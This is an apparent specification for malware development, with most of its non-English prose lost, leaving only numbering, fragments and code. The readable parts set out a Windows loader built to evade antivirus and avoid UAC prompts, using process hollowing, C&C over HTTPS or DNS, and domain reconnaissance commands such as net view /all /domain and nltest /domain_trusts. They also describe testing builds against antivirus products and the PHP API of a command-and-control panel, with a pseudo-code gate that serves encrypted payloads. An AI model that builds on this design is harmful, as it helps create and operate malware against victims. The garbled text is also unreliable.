 , 



    ,    .
           .



      SmartScreen:
1.         https://lolbas-project.github.io/
2.  ,    (, .,    ,   .),
         ( ).
       ,   -     /     .
3.         

  

1.  
1.1.     ,    - 
2.      ,    IP-. ,    ,    :
           ,        .
  - hardware id (   ).    .
2.1.         ().      -       .
                 .
2.  x86/x64.   x64.      ,   .
3.    :
-  
-  
-    
-    
-   net view /all
-   net view /all /domain
-   nltest /domain_trusts /all_trusts
- IP-    -      
4.   
4.1.    .
5.   UAC
6.       :
6.1.     
6.2.     ( ,   ,    )
   :       ; ,    - ; ,     ,   .
        .
 ,            .
7.   .exe,   .dll
8.     (process hollowing, dll from memory   )
9.     
10.        C&C (HTTPS, DNS,  )
11.       (     cmd.exe  WerFault.exe,      )
12.  ;    .   -    , DPI.
      ,   ,             DPI.
13.     ( ,  ;     ).
        ,   :
13.1.      
13.2.     
13.3.       ,       .
          ID , hostname,   .
           - ,    .
14.   ,       .     .
15.  - Windows Server 2008 R2+, Windows Vista+  -    ,       .
     Windows Server 2008 ( R2,     XP),    .
16.    ,  (     .Net)      .
   .        (,           VMWare Player),      .
PowerShell -   2.0.
   cscript, jscript, .bat,      .

 ,     ,           ,      .Net  Microsoft Visual C++ Redistributable  .
17.    (  ):
17.1.      .exe,    .dll
17.2.   (,  1)
17.3.  CRT/STL (   ).


 

          ,      .
,         (VPS,  ).

0.    1 ()    ()   +     (.),      .
     .exe,    .dll -       .dll.
   .dll   rundll   .
     ,     /.
     .      .
      VPS. ,   V  VPS -  virtual ( ).
1.   dyncheck.com   .
2.   4        dyncheck.com.
 dyncheck: 240  ,    .
2.1.    
- Windows Defender
- ESET Nod32
- Avast Home
- Kaspersky Antivirus
- Bitdefender
3.        :
3.1. putty.exe
3.2. notepad.exe
3.3. DbgView.exe https://docs.microsoft.com/en-us/sysinternals/downloads/debugview
        .      MessageBox("hello, world!"),  ,
 . ,    WinApi ( GDI).   - ,       .
    - .
4.          (Windows Defender, ESET Nod32)    Windows  .
  ,   ,   .
    .
5.    " " (   ;   .exe -   .exe  )    qaz.im (  )   Chrome    .
        ,   .
6.  .        EV-     Chrome,   Chrome     ,     .
7.      .     -.
           /.

      ,     .
 ,     ,       ,   -         .
  ,     ,     .
      VPS   hardware id,        -.


  

  .
    PHP    .
   $adm   .
         PHP      (..     ).

     .

     HTTP     ,      HTTP-,       .
   ,     .
    HTTP,      .

 

1.  
$adm->register_property($plugin_name, $prop_name, $length)        
  $plugin_name:    
  $prop_name:      
  $length:        
TODO:             ( ).
       ( ,      -   ).
 true   , false   .

      ()  .       .

,          HTTP-, URI-    HTTP-,   .
      ,         ,    .
       .
    ,  , -   -        .


2.  
$adm->get_property($plugin_name, $prop_name, $group = null)   ()   ;   
  $plugin_name:    
  $prop_name:      
  $group:         (), .   ,        .
  .


3.   
$adm->get_groups($plugin_name)                                  ,    
  $plugin_name:    
  :
" " => "" {
   " 1" => " 1"
   ...
   " N" => " N"
}

3.  
$adm->get_payload($bitness, $group)                                
  $bitness:         86  64 (int)
  $group:        
 ,    

4.  
$adm->knock($group, $id = null)                                 
  $group:        
  $id:            ()
  .

5.    
$adm->put_sysinfo($group, $info, $id = null)                  
  $group:        
  $id:            ()
  $info:            .
   :
  hostname:     
  uname:        
  os:           
  os_bitness:   
  os_version:   
  av:             
  net:           net view /all
  netdomain:     net view /all /domain
  trust:         nltest /domain_trusts /all_trusts
 ,     - .
   .

6.  
$adm->put_telemetry($group, $data, $id = null)                
  $group:        
  $id:            ()
  $data:           


  -  ,     .
   :
-      
-      
-    (,    )
-     
-   

 

    -     API,       ,  .
  (  ),      (  error_reporting).

 

 -    PHP,     .
      ,      .
    :

1.   
$gate->install()
   ,  .

2.  
$gate->process_request($HTTP_request)
     .
  $HTTP_request:           
 :
  code =>              HTTP-  (  )
  response_headers =>  HTTP-  .    200,   .
  response_body =>     HTTP-  .    200,   .

    400 -         .
    404 -          ,       .
    200 -      ,     .
         ;        .

PHP

 PHP -   7.0.
     .
  -  -   .

   (PHP- )

require_once "adm_api.php";
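// presumably adm_api.php supplies the $adm object used below (original comment text was lost in extraction)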

/**
 * Sketch of a gate plugin exposing the two entry points this page lists for a
 * gate: install() and process_request().
 *
 * This is pseudo-code, not runnable PHP: conditions are written as plain words,
 * the typed property and typed local declarations are not valid PHP syntax,
 * the foreach header is malformed, and several array literals have unbalanced
 * quotes. The $adm object is used inside the methods without being passed in
 * or declared global, and $plugin_name is read as a bare variable instead of
 * through $this.
 *
 * encrypt_payload() and arrange_headers_somehow() at the end of the class are
 * empty stubs; the listing does not show what they would do.
 *
 * For readers analysing this listing: the only externally visible behaviour
 * shown is the status code returned by process_request() (400, 404 or 200).
 */
class sample_gate {
// Name handed to the $adm property calls below as the plugin identifier.
string $plugin_name = "Plagin Vasi";

/**
 * One-time setup hook for the plugin.
 *
 * Registers a single property, RSA_public_key, under this plugin name.
 */
function install() {
    // The third argument is the length parameter from the API listing on this
    // page; the unit (bits, bytes, characters) is not stated in the visible
    // text - TODO confirm.
    $adm->register_property($plugin_name, "RSA_public_key", 4096);
}

/**
 * Handles one incoming HTTP request and decides the response.
 *
 * Flow as written: reject an invalid request with code 400; otherwise walk the
 * groups and, for the first group the request matches, record the contact via
 * knock() and then handle the request as telemetry, sysinfo or a payload
 * request before answering with code 200; answer 404 when no group matched.
 *
 * In the payload branch the payload is fetched by bitness and group, the
 * RSA_public_key property is read back, and both go to encrypt_payload().
 * The computed body and headers are assigned to local variables, and the 200
 * return literal is elided with an ellipsis, so the listing does not show how
 * they reach the response.
 *
 * NOTE(review): two calls do not match the API listing earlier on this page.
 * get_groups_list() is called with no arguments where the listing documents
 * get_groups() taking the plugin name, and knock() is called with a remote
 * address where the listing documents a group plus an optional id.
 *
 * @param string $request The raw HTTP request, per the gate interface listing.
 * @return array Array with a code entry; the gate interface listing on this
 *               page also names response_headers and response_body.
 */
function process_request(string $request) {
    // Fetch the groups that the matching loop below iterates over.
    array $groups = $adm->get_groups_list();

    // Validation comes first, so a malformed request never reaches group matching.
    if(not valid request)
        return array("code=>"400");  // bad request;            

    foreach($g => $groups) {
        if(request matches this group) {
            $adm->knock($REMOTE_ADDR);
            if(request is telemetry)
                $adm->put_telemetry($g, $message_from_request);
            else if(this is sysinfo) {
                $info = get_sysinfo_from_request();
                $adm->put_sysinfo($g, $info);
            }
            else if(request for payload) {
                $bitness = figure out bitness from the request;
                $payload = $adm->get_payload($bitness, $g);
                $encryption_key = $adm->get_property($plugin_name, "RSA_public_key");
                $HTTP_body = encrypt_payload($payload, $encryption_key);
                $HTTP_headers = arrange_headers_somehow();
            }
            return array("code=>"200", "response_headers" => ...);
        }
    }

    return array("code=>"404");
}

//     ,      
function encrypt_payload() {}

function arrange_headers_somehow() {}
//etc
}
